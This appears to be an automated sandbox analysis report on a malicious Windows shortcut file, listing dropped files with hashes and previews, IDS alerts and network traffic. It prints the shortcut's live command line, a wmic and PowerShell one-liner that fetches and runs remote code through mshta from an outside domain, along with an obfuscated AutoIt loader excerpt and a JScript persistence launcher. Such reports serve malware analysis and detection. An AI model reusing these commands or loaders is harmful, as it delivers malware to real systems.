                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:ASCII text, with very long lines (393)
                                                                                                        Category:dropped
                                                                                                        Size (bytes):16525
                                                                                                        Entropy (8bit):5.338264912747007
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:lH4ZASLaTgKoBKkrNdOZTfUY9/B6u6AJ8dbBNrSVNspYiz5LkiTjgjQLhDydAY8s:kIb
                                                                                                        MD5:128A51060103D95314048C2F32A15C66
                                                                                                        SHA1:EEB64761BE485729CD12BF4FBF7F2A68BA1AD7DB
                                                                                                        SHA-256:601388D70DFB723E560FEA6AE08E5FEE8C1A980DF7DF9B6C10E1EC39705D4713
                                                                                                        SHA-512:55099B6F65D6EF41BC0C077BF810A13BA338C503974B4A5F2AA8EB286E1FCF49DF96318B1DA691296FB71AA8F2A2EA1406C4E86F219B40FB837F2E0BF208E677
                                                                                                        Malicious:false
                                                                                                        Preview:SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:066+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:066+0200 ThreadID=6912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):29752
                                                                                                        Entropy (8bit):5.402809835158228
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:acb4I3dcbPcbaIO4cbYcbqnIdjcb6acbaIewcbecbYI/hcbV:V3fOCIdJDeb/K
                                                                                                        MD5:15AF3642DFD9EB6C4A95A4EE08DF39BA
                                                                                                        SHA1:A6C26D6A182CA4AF46FAC16B777172D801F06CF9
                                                                                                        SHA-256:AFA04BB4A7127940F96CA48F21A36199507F7F79A46FF764ADAED53B7C2D5348
                                                                                                        SHA-512:CFB9AE9F11BBE8C7E5834ACF0E29356CE55EA7DD4E53B7094197754AD336BFED5CC9F3C5F45FBE5C44E6EEF79D313F1FD1A945060029B052E5A548FE86651DFC
                                                                                                        Malicious:false
                                                                                                        Preview:05-10-2023 08:20:22:.---2---..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:20:22:.Closing File..05-10-
                                                                                                        Process:C:\Users\Public\Guard.exe
                                                                                                        File Type:ASCII text, with very long lines (1266)
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1241204
                                                                                                        Entropy (8bit):5.143645009876369
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:D8V+jcfSicb4/G10K5F3/nzEGPIWX30KrCIc4S36d6tWRYd1d:DctG4umKX379xdrggeIYZ
                                                                                                        MD5:0252F33BDF3B1C62FAAE9D8A72C51EFA
                                                                                                        SHA1:EE89730257F00DDD7EA00865BB974DAE13AD13A5
                                                                                                        SHA-256:E71627AA277109F05E80805E5B88B4D546018F59EB03B91C5DA7FEE27F654FE3
                                                                                                        SHA-512:0133DDB064E9D39E71B9BD3E0B27A11E20619A9B17F1D18DAA06E052BCB994D86DEEAAF9B37B928D659BE8E10EEB4287BD7E2CBAF5133F2C755CA32006C38C31
                                                                                                        Malicious:false
                                                                                                        Preview:Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]96]
                                                                                                        Process:C:\Users\Public\Guard.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):190
                                                                                                        Entropy (8bit):4.702878525317735
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:RiMIpGXfeNH5E5wWAX+eLCMuL4EkD5yKXW/Zi+0/RaMl85uWAX+eLCMuL4EkD5yn:RiJbNHCwWDeLPqJkDrXW/Zz0tl8wWDek
                                                                                                        MD5:ADD89CDE8D0D8247BA4058565F6AF1D1
                                                                                                        SHA1:BDE05EE487B598FC744EBE571202C8BDED415560
                                                                                                        SHA-256:49456CC7BEEF073EF45D3F3CA43AFFFB39A1885C386F8C24C29A7F3AA86A19AB
                                                                                                        SHA-512:15E9AB5071BB27D81BC6356AEA39BBD4F07C554E25B1984BE524DDDC86DC861950F5E18237D33A56A2397E30D700BFF22B338CE4F9B596A0F5BDD600A2F6E3DA
                                                                                                        Malicious:true
                                                                                                        Preview:new ActiveXObject("Wscript.Shell").Run("\"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\SwiftWrite.pif\" \"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\G\"")
                                                                                                        Process:C:\Users\Public\Guard.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):893608
                                                                                                        Entropy (8bit):6.62028134425878
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                                                        MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                        SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                                                        SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                                                        SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:PDF document, version 1.6
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3438614
                                                                                                        Entropy (8bit):7.565365361527372
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:49152:GtZNvjFRGx8mEuSEEBWfJoGnihnR3YSnyYbAYFdhzQCnGkH:GtZJFRGxZEuSEEBE6GkR3YSnyuFsXkH
                                                                                                        MD5:13E442980DFB1FED9EE67DD9CE5C165D
                                                                                                        SHA1:958D4B5F59CF46E817461DD2C67CDE1106FFE508
                                                                                                        SHA-256:3D80994983233EE77AF8200DC292C95D12AD7DF091BB3FB83DA6613CE74D6CCE
                                                                                                        SHA-512:AE9A6CEE5FAC67C3623EC5F51FF053BA47B9B4C0F811FDDA9DF290AF53923F3184771F31E1F62F889164508334E1C44407EBF0DC038FC116C1A7826625E0FE2F
                                                                                                        Malicious:false
                                                                                                        Preview:%PDF-1.6.%.....1 0 obj.<<./Type /Catalog./Version /1.6./Pages 2 0 R.>>.endobj.6 0 obj.<<./Length 526549./Type /XObject./Subtype /Image./Filter /DCTDecode./BitsPerComponent 8./Width 2480./Height 3508./ColorSpace /DeviceRGB.>>.stream.......+Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............-....'..-....'.Adobe Photoshop CS6 (Windows).2024:12:13 16:15:59..................................................................................&.(.........................................H.......H..........Adobe_CM......Adobe.d...................................................................................................................................................q.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5.
                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                        File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >), ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):101
                                                                                                        Entropy (8bit):4.882484479599994
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:HRAbABGQaFyw3pYoN+E2J5yKXW/Zi+URAAy:HRYF5yjoN723yKXW/Zzyy
                                                                                                        MD5:E13AD229D874CB584EE9C5EAF00F02A5
                                                                                                        SHA1:99EFF6F0EFC61DCFDD83E19A7A88355E8D82BF77
                                                                                                        SHA-256:7448CB3A6A286F6BDF4F036DEAB44060B5E1E17368D2E1C560CCA5EEFEF342A1
                                                                                                        SHA-512:DB00B1447019348D5D90A1BD0A5E30FF60D0ED92E3308418B659D7B8B5796A04D4CF371D6824574E84F1ACB8D1CFC193E4B7F8EC3EE93862FF6F4C01012BD801
                                                                                                        Malicious:true
                                                                                                        Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" ..
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1083904
                                                                                                        Entropy (8bit):6.306322475397739
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24576:xrORE29TTVx8aBRd1h1orq+GWE0Jc5bDTj1Vyv9Tvan1b:x2EYTb8atv1orq+pEiSDTj1VyvBa1
                                                                                                        MD5:302EA0EBB32FF34A46D6B6DF1E66F9FE
                                                                                                        SHA1:C2B94B103DD7595B3579C3170A902E72F7C1B310
                                                                                                        SHA-256:105B0AF8E2726AD7D910B1AC49B918EE57B3B4BB4F66DCCE4802EAC95F5D8E07
                                                                                                        SHA-512:9ACDBA741DBC6650014305EFFFB214CC5E7D0D18F11373A8147F4DD98249BCF3E1EE5B19541C3B079414C635674F5315EEE881B2BE0D0D2C05BA39ACD9D0AF73
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 65%
                                                                                                        Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......o1).+PG.+PG.+PG....>PG.....PG.....PG.....*PG.y8B..PG.y8C.:PG.y8D.#PG."(.#PG."(..*PG."(..PG.+PF..RG..9I.{PG..9D.*PG..9..*PG.+P.*PG..9E.*PG.Rich+PG.........................PE..d...<._g.........."......4...R.......T.........@.....................................o....`...@...............@..............................\..|........@...@..Ho..............t...Pp..........................(...pp...............P..8............................text...(3.......4.................. ..`.rdata...B...P...D...8..............@..@.data... ........P...|..............@....pdata..Ho...@...p..................@..@.rsrc....@.......B...<..............@..@.reloc..t............~..............@..B................................................................................................................................................................................................
                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):55
                                                                                                        Entropy (8bit):4.306461250274409
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                        Malicious:false
                                                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                        Process:C:\Windows\System32\wbem\WMIC.exe
                                                                                                        File Type:ASCII text, with CRLF, CR line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):160
                                                                                                        Entropy (8bit):5.095703110114614
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MgnRUHOAFJQAiveyn:Yw7gJGWMXJXKSOdYiygKkXe/egy9eAin
                                                                                                        MD5:5565F108385973B28C33BBB1C04F9FAA
                                                                                                        SHA1:1DF0A562B892A5AF8B803D339EA22D6DB250B2DF
                                                                                                        SHA-256:85F986844CF6DFEDD175C15DADDF2D2F727071FF7ED835F850874BF4B2E032F3
                                                                                                        SHA-512:9D99F4F848AD495242BFF3AA34E82BE4F54FEF2CC408039B060D3D677545F037AD75D81CBB1245395B6BBB7361889C58B043C4EC64DCFD487AAFF8BC57C2D83B
                                                                                                        Malicious:false
                                                                                                        Preview:Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 5412;...ReturnValue = 0;..};....
                                                                                                        File type:MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=1, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                                                                                        Entropy (8bit):3.3667104731332596
                                                                                                        TrID:
                                                                                                        • Windows Shortcut (20020/1) 100.00%
                                                                                                        File name:7A2lfjTYNf.lnk
                                                                                                        File size:1'030 bytes
                                                                                                        MD5:767810929a7b0dddecaad84a15aed733
                                                                                                        SHA1:529f0a59889968b60a992452e3d3bd876a7a02bc
                                                                                                        SHA256:295fae2f581e04308ae737dd0ee934da80099da2d9b3e90d7d907a57265b2a91
                                                                                                        SHA512:bdd82a66fdbf572802c75ac7eec16f1f707d7177f7013f4aeddaf8bfd442f06b01959ca3858c39b9122b7f48a2cba0354c8274f76fb05bf174cd0c214262a132
                                                                                                        SSDEEP:24:8b/BUlgKN4ee+/3HkWNdk6Zoc6wObGarabqyI+pu:8ruGepHldkU6xK4aey3w
                                                                                                        TLSH:0B112D081AD54F20E676CE356879B311863A3C4AEDB34F1D018086892535510B865F2F
                                                                                                        File Content Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................
                                                                                                        Icon Hash:74f4d4dcdcc9e1ed

                                                                                                        General

                                                                                                        Relative Path:..\..\..\..\Windows\System32\Wbem\wmic.exe
                                                                                                        Command Line Argument:process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghepduy1325')"
                                                                                                        Icon location:shell32.dll
                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                        2024-12-23T08:39:19.508617+01002026434ET MALWARE VBScript Redirect Style Exe File Download1147.45.49.155443192.168.2.649719TCP
                                                                                                        2024-12-23T08:39:33.055367+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649762147.45.49.155443TCP
                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Dec 23, 2024 08:39:16.950345039 CET49719443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:16.950380087 CET44349719147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:16.950557947 CET49719443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:16.966376066 CET49719443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:16.966387987 CET44349719147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:18.486840010 CET44349719147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:18.486936092 CET49719443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:18.539889097 CET49719443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:18.539911032 CET44349719147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:18.540236950 CET44349719147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:18.540299892 CET49719443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:18.542596102 CET49719443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:18.583357096 CET44349719147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:19.094579935 CET44349719147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:19.094650984 CET49719443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:19.286380053 CET44349719147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:19.286393881 CET44349719147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:19.286444902 CET44349719147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:19.286462069 CET49719443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:19.286483049 CET44349719147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:19.286520958 CET49719443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:19.286545992 CET49719443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:19.337564945 CET44349719147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:19.337593079 CET44349719147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:19.337651968 CET49719443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:19.337665081 CET44349719147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:19.337728977 CET49719443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:19.480526924 CET44349719147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:19.480567932 CET44349719147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:19.480612040 CET49719443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:19.480634928 CET44349719147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:19.480691910 CET49719443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:19.480717897 CET49719443192.168.2.6147.45.49.155
